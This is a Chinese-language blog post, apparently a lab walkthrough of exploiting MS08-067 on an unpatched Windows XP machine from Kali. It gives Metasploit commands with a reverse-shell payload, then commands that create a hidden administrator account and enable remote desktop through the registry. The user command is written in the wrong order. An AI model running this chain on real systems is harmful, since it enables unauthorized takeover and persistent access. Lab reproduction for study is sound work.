我竟然把這個坑填下去了,可喜可賀。
1 ms08_067
ms08_067是微軟win作業系統中存在的一個伺服器服務漏洞,在win server2008之前的系統都會受這個漏洞影響,黑客可以利用這個漏洞控制目标系統。
2 操作概述
使用kali linux攻擊機對win xp系統利用此漏洞進行攻擊,在靶機上建立管理者賬号并遠端控制靶機。
3 實驗環境
kali linux攻擊機(上一篇部落格提到過)
win xp sp3 english(純淨版,不帶任何更新檔)
4 控制靶機
進入kali終端,輸入以下指令運作msf:
msfconsole
尋找并使用子產品
我們要找的是ms08_067漏洞,是以我們首先尋找此漏洞
search ms08_067_netapi
我們找到漏洞後,使用此漏洞
use exploit/windows/smb/ms08_067_netapi
加載攻擊載體
攻擊載體有很多,我們這次使用shell_reverse_tcp
set payload generic/shell_reverse_tcp
設定ip
LHOST為攻擊機ip,RHOST為靶機ip,例如:
set LHOST 192.168.1.62
尋找對應版本target
target需要與靶機系統版本對應,在不确定版本時設定target為0也可自動選擇
set target 0
運作
exploit
到此,我們就進入了靶機系統,你的kali Terminal應該顯示以下資訊。

5 遠端桌面連接配接
接下來,我們嘗試在靶機上建立賬戶并使用遠端桌面連接配接靶機,
首先,我們建立一個賬戶。
user net host-name password /add
提升為管理者權限
net localgroup administrators host-name /add
winxp遠端操控端口為3389,我們将這個端口打開
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用netstat檢視端口
netstat -an
這時,我們會發現3389端口處于開啟狀态。
然後,我們可以用區域網路内的計算機遠端桌面連接配接到靶機,win10運作——>MSTSC。
以上就是ms08_067漏洞利用複現的全過程。
6 問題記錄
通路445端口被拒絕
裝了445端口更新檔的winxp将445端口停用,是以複現此例程時不要使用帶更新檔的win xp。
還有可能是因為靶機打開了防火牆,複現時需要将防火牆關閉。
設定target
如果不設定target,将不會判斷靶機的系統版本進行攻擊。建議将target設定為0,target為0時會自動判斷靶機系統版本攻擊。
7 小結
winxp上的漏洞其實還有很多,感興趣的同學可以查一下其他的漏洞并嘗試複現,折騰永不停止!